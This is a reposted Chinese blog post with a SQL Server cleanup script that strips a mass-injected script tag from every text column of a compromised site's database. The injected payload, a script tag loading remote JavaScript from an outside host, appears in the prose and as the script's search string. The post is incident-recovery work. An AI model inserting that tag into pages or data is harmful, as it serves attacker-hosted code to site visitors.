這幾天朋友的網站天天被搞破壞的人惡意注入,也許是程式沒寫好的原因,資料庫每個字段都被加了一段 script(<Script Src=http://%63%2Enuclear3.com/css/c.js></Script>),而這個 script 位址時不時地有變化。因為這個朋友最怕資料丟失,希望恢復資料,於是我就幫他寫了一個清理字段的 sql 腳本。由於下面的腳本只比對 @injectSql 中的固定字串,位址變化後需要先改成新的字串再執行一次。呵,以後自己也可以用到。
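-- Removes one injected <script> marker from every text, ntext, varchar and
-- nvarchar column of every base table in the current database.
--
-- The listing on this page arrived damaged: the dynamic statements are cut
-- off, neither loop fetches the next row (so it would never advance), and
-- "END CATCH; else" does not parse. This version keeps the stated purpose and
-- changes the mechanics:
--   * one cursor over INFORMATION_SCHEMA instead of two nested cursors;
--   * identifiers are quoted with QUOTENAME, and the marker is passed as an
--     sp_executesql parameter instead of being pasted into the statement;
--   * text/ntext columns are cleaned with REPLACE over a (n)varchar(max) cast
--     instead of PATINDEX/UPDATETEXT, where the '%' characters in the marker
--     would act as wildcards;
--   * every column type is wrapped in TRY/CATCH so one failure does not stop
--     the run.
--
-- Operational notes:
--   * The UPDATEs modify data in place. Take a backup, or run on a restored
--     copy, first.
--   * Only the exact string in @injectSql is removed. The page says the script
--     address changes over time, so each variant needs its own run.
--   * This cleans stored data only. Until the injectable query in the
--     application is fixed, the marker can be written back.
--   * Needs SQL Server 2005 or later (TRY/CATCH, varchar(max)).
DECLARE @schemaName AS nvarchar(128),
        @name       AS nvarchar(128),
        @columnName AS nvarchar(128),
        @columnType AS nvarchar(128),
        @injectSql  AS nvarchar(111),
        @maxType    AS nvarchar(20),
        @castColumn AS nvarchar(300),
        @castMarker AS nvarchar(64),
        @stmt       AS nvarchar(max);

-- The injected marker exactly as it appears in the affected columns.
SET @injectSql = '<Script Src=http://%63%2Enuclear3.com/css/c.js></Script>';

-- STATIC takes a snapshot of the column list before any UPDATE runs.
DECLARE curLabel CURSOR LOCAL STATIC FOR
    SELECT
        c.TABLE_SCHEMA,
        c.TABLE_NAME,
        c.COLUMN_NAME,
        c.DATA_TYPE
    FROM INFORMATION_SCHEMA.COLUMNS AS c
    INNER JOIN INFORMATION_SCHEMA.TABLES AS t
        ON  t.TABLE_SCHEMA = c.TABLE_SCHEMA
        AND t.TABLE_NAME   = c.TABLE_NAME
    WHERE t.TABLE_TYPE = 'BASE TABLE'
      AND c.DATA_TYPE IN ('text', 'ntext', 'varchar', 'nvarchar');

OPEN curLabel;
FETCH NEXT FROM curLabel INTO @schemaName, @name, @columnName, @columnType;

WHILE @@FETCH_STATUS = 0
BEGIN
    -- Cast to the max type of the column's own family: REPLACE truncates its
    -- result at 8000 bytes unless the input is varchar(max)/nvarchar(max), and
    -- CHARINDEX does not accept text/ntext directly.
    SET @maxType = CASE
                       WHEN @columnType IN ('ntext', 'nvarchar') THEN N'nvarchar(max)'
                       ELSE N'varchar(max)'
                   END;
    SET @castColumn = N'CAST(' + QUOTENAME(@columnName) + N' AS ' + @maxType + N')';
    SET @castMarker = N'CAST(@marker AS ' + @maxType + N')';

    -- The WHERE clause limits the write to rows that actually hold the marker.
    SET @stmt = N'UPDATE ' + QUOTENAME(@schemaName) + N'.' + QUOTENAME(@name)
              + N' SET ' + QUOTENAME(@columnName)
              + N' = REPLACE(' + @castColumn + N', ' + @castMarker + N', '''')'
              + N' WHERE CHARINDEX(' + @castMarker + N', ' + @castColumn + N') > 0;';

    BEGIN TRY
        EXEC sp_executesql @stmt, N'@marker nvarchar(111)', @marker = @injectSql;
    END TRY
    BEGIN CATCH
        -- Report the column that could not be cleaned (for example a computed
        -- or otherwise non-updatable column) and carry on with the next one.
        PRINT(@name + '.' + @columnName + ': ' + ERROR_MESSAGE());
    END CATCH;

    FETCH NEXT FROM curLabel INTO @schemaName, @name, @columnName, @columnType;
END

CLOSE curLabel;
DEALLOCATE curLabel;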
本文轉自 netcorner 部落格園部落格,原文連結:http://www.cnblogs.com/netcorner/archive/2008/12/06/2912095.html ,如需轉載請自行聯繫原作者